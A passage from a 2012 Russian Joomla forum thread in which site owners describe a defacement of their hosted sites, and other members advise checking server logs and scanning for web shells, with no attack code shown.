и вам хостер не сказал что ломают их а не cms какая бы она не была, вас просто развести хотят как они это только и умеют делать нет чтоб за своим железом смотреть и ПО вовремя обновлять, только письма все и получают мол уже давно не меняли пароль, это сведетельствует что они потеряли базу пользователей и предупреждают т.к. открыто сказать нельзя вот и переформулируют, не одна cms не отличается везде бывает со временем находится уязвимости HTML голый и (сервер без php и sql а то через них залезут)

как они вам еще не посоветовали вместо удалять индех.пых вообще канал сделать по IP туннелю между вами и сайтом тогда точно ни кто не сломает и посещать даже не будет
Записан
*

sterden

  • Новичок
  • 7
  • 0 / 0
Re: Взлом сайта
« Ответ #23 : 11.11.2012, 22:15:05 »
Сегодня, 11.11.12 мой сайт  взломали. Хостинг hc.ru. Установлен компонент jhackguard. На сайте появилась надпись: hacked by Malikiajdar. Pakistan cyber Attacker. И еще какой-то текст на английском и какие-то картинки. На компьютере стоит антивирус nod 32, кроме того недавно и сегодня проверял сканером доктор веб - все чисто. Пароли на хостинг и cpanel остались теми же, то есть хакеры их не сменили. У меня была копия сайта, сделанная akeeba backup, которую я разместил в корневой каталог веб-содержимого public_html, таким образом восстановив сайт. У меня 2 вопроса:

1. Как хакеры могли взломать сайт, то есть разместить в каталоге public_html какие-то данные, если пароли на хостинг и cpanel остались теми же, а в Joomla установлен компонент против атак хакеров jhackguard?

2.Могли ли хакеры внести какие-нибудь изменения в другие папки домашнего каталога (кроме public_html), например .cpanel, public_ftp и т.д., и что нужно делать в этом случае?
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взлом сайта
« Ответ #24 : 11.11.2012, 22:21:32 »
Нод 32 сменит на авиру. Если есть логи, смотрите их. Поищите шеллы сканерами форумчан (ссылка на них есть в подписи). Выясняйте через что ломают.
Записан
*

sterden

  • Новичок
  • 7
  • 0 / 0
Re: Взлом сайта
« Ответ #25 : 11.11.2012, 22:47:13 »
Скажите, логи нужно смотреть в самой Joomla или на хостинге? Если в ждумле, то не получится, так как содержимое public_html было полностью заменено. И еще как выяснять, через что ломают?
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взлом сайта
« Ответ #26 : 12.11.2012, 01:21:56 »
Логи хостинга. access.log and error.log
Сканер в помощь, для поиска через что ломают
Записан
*

MacDac

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Re: Взлом сайта
« Ответ #27 : 13.11.2012, 14:32:29 »
Цитата: sterden от 11.11.2012, 22:15:05
Сегодня, 11.11.12 мой сайт  взломали. Хостинг hc.ru. Установлен компонент jhackguard. На сайте появилась надпись: hacked by Malikiajdar. Pakistan cyber Attacker. И еще какой-то текст на английском и какие-то картинки. На компьютере стоит антивирус nod 32, кроме того недавно и сегодня проверял сканером доктор веб - все чисто. Пароли на хостинг и cpanel остались теми же, то есть хакеры их не сменили. У меня была копия сайта, сделанная akeeba backup, которую я разместил в корневой каталог веб-содержимого public_html, таким образом восстановив сайт. У меня 2 вопроса:

1. Как хакеры могли взломать сайт, то есть разместить в каталоге public_html какие-то данные, если пароли на хостинг и cpanel остались теми же, а в Joomla установлен компонент против атак хакеров jhackguard?

2.Могли ли хакеры внести какие-нибудь изменения в другие папки домашнего каталога (кроме public_html), например .cpanel, public_ftp и т.д., и что нужно делать в этом случае?

С моим случилось тоже самое 11.11.12 и хостер и у нас с вами один;) 
Записан
*

MacDac

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Re: Взлом сайта
« Ответ #28 : 19.11.2012, 16:21:33 »
Посоветуйте что делать !
Сегодня обнаружил вот такие обращения к сайту.

Спойлер
[свернуть]

Возможно что это обращение к ранние установленному шеллу? Неделю назад сайт был взломан. И сейчас переустановлен с нуля.
Каталога  mod_systems ни тем более mod_systems1 у меня нет и файла mod_system.php тоже нет.

Но по этому адресу /modules/mod_system1/mod_system.php
появляться 500-оя ошибка вот с такой надписью.
Спойлер
[свернуть]
Плюс ещё строчка.
Fatal error: Class 'JModuleHelper' not found in /home/*****/public_html/libraries/gantry/core/renderers/gantrymodulesrenderer.class.php on line 60
« Последнее редактирование: 19.11.2012, 16:28:11 от MacDac »
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взлом сайта
« Ответ #29 : 19.11.2012, 18:43:13 »
просто сканирую как и всегда теперь это как должное
Записан
1 2  Все   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 3989 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 4359 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Похоже на взлом J! 3.5

Автор memo

 Ответов: 7
Просмотров: 3742 		Последний ответ 23.09.2022, 10:56:06
от marksetter
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

 Ответов: 678
Просмотров: 271539 		Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

 Ответов: 7
Просмотров: 3326 		Последний ответ 05.10.2021, 21:39:26
от ShopES